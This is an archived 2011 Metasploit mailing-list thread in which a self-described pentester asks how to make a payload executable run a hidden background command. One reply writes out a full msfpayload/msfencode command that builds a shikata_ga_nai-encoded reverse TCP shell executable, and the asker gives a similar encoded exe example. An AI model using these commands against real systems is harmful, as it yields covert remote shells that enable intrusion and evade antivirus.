Metasploit mailing list archives
Re: windows/exec
From: alfonso caponi <alfonso.caponi () gmail com>
Date: Wed, 9 Mar 2011 22:06:56 +0100
No, at least hidden on the screen to the "normal user" :) I'm not writing a malware, but I'm making a pentest. In my scenario I would use a single binary and does not edit the registry etc. 2011/3/9 Canberk BOLAT <canberk.bolat () gmail com>
Do you want to make it something like hidden process if i am not understand wrong? :) 2011/3/9 alfonso caponi <alfonso.caponi () gmail com>:Yes.... I know... but how can I run a Win32 command shell in background?:)My payload (created with msfpayload) works fine in "foreground". 2011/3/9 Nicolas Krassas <krasn () deventum com>Google is nice many times and the results are faster than the list, it will be nice for you to take a look athttp://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_TrainingOn Wed, Mar 9, 2011 at 8:04 PM, alfonso caponi <alfonso.caponi () gmail com>wrote:mmmm no, in my scenario I need use a exe file. Would be useful windows/download_exec... :( 2011/3/9 Ahmed Shawky <ahmed () isecur1ty org>./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.8 LPORT=443 R | msfencode -t exe -e x86/shikata_ga_nai -c 10 -o out.exe On Wed, Mar 9, 2011 at 6:45 PM, alfonso caponi <alfonso.caponi () gmail com> wrote:Hi list, according to you, using msfpayload (windows/exec), how can I createanexecutable file to run a dos shell command in background? For example a first step: ./msfpayload windows/exec CMD="ping -n 5 1.1.1.1" R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -o test.exe Thank you very much, AL *ps: windows/download_exec not works on my XP sp3. no connections created and the process remains active. (#3771?) _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework-- Ahmed Shawky El-Antry Pen-tester, Programmer and System administrator lnxg33k owner "http://lnxg33k.wordpress.com" Isecur1ty team member"http://www.isecur1ty.org" Twitter @lnxg33k_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework-- Canberk Bolat Security Researcher http://twitter.com/cnbrkbolat http://cbolat.blogspot.com
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- windows/exec alfonso caponi (Mar 09)
- Re: windows/exec Ahmed Shawky (Mar 09)
- Re: windows/exec alfonso caponi (Mar 09)
- Message not available
- Re: windows/exec alfonso caponi (Mar 09)
- Re: windows/exec Canberk BOLAT (Mar 09)
- Re: windows/exec alfonso caponi (Mar 09)
- Re: windows/exec alfonso caponi (Mar 09)
- Re: windows/exec Ahmed Shawky (Mar 09)